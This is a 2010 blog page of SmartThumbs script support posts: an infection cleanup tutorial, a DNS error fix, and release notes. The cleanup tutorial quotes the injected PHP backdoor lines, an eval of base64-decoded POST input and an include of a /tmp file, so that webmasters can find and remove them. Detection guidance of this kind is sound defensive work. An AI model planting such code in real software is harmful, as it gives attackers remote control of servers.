Posted by MMagery on Saturday May 8, 2010 Many webmsters have recently (until last update) noticed rouge sites after clicking on their TGPs and MGPs. Cause was ST exploit and vulnerability in ST that was fixed in last update. However you HAVE TO be sure that your ST is clean. So here is quick tutorial. If you need help with cleaning you can hire system administrator from DLXER.com
1. step - UPDATE your ST to lastest version!
2. step - open st/admin/variables.php file and search for strings @eval(base64_decode($_POST or $qall=1;@include_once in case you find them your ST install is still infected. You have to remove lines:
$qall=1;@include_once(’/tmp/sesa.tmp’);
@eval(base64_decode($_POST [qxp]));//’;
ST variables.php exploit strings
3. step - remove file /tmp/sesa.tmp (command: rm -f /tmp/sesa.tmp) for future protection you can setup 3 min cronjob which will clean all *.tmp files in /tmp/ folder
4. step - cleaning mysql database - first you have to find which mysql database your ST install is using, data is in st/classes/mysql.php after that use phpmyadmin tool and login to your mysql database. Find table st_settings then column niche. You will notice same exploit strings here. You have to remove them.
5. step - lock down your ST install run command php st/admin/lock.php
update: just got update that /tmp/webcam.tmp could be filename for include statement too, so if you have anything like @include_once(’/tmp/XXXXXX.tmp’); in your variables.php file your ST is infected
Posted by MMagery on Saturday Apr 17, 2010 I just came along one forum post which is about error one webmaster got recently with his SmartThumbs script:
ST update: Can’t connect ST server (fsock error: 0 php_network_getaddresses: getaddrinfo failed: hostname nor servname provided, or not known (Cannot resolve domain name. Domain does not exist or DNS error.))
There is really nothing wrong with ST itself. This is typical error which PHP outputs when local DNS resolver does not work properly. Most likely every script that needs to connect to another domain from your server won’t work and will output similar error. Solution is simple - either send ticket to your adult hosting provider or login with SSH, and edit file /etc/resolv.conf (on most Linux distros) and enter level3 public DNS resolver IPs there - 4.2.2.1 and 4.2.2.3 - save file and refresh ST!
Posted by MMagery on Tuesday Feb 23, 2010 I noticed ST (SmartThumbs - you can download free version here) giving PHP related error “Fatal error: Allowed memory size of n bytes exhausted (tried to allocate n bytes) in path”. No matter how big memory limit was set in php.ini ST managed to exhaust it. Obviously a memory leak. So this has been sorted in latest version. Probably you will have to upload manually working scan_class.php into st/classes directory.
You can find more about this issue here.
Release notes from latest version:
Version 5.77
# added support for new “ns=1″ parameter in st.php (with this parameter “Sell traffic” options are ignored)
# fixed bug with date index page mark (was not replaced with correct date)
# fixed problem with memory limit fatal error (bypassed PHP bug)
# if this update could not download update file unzip scan_class.php file from this zip and upload it in binary mode to st/classes/ folder (then start update again and it should start work).
After update don’t forget to lock your ST!
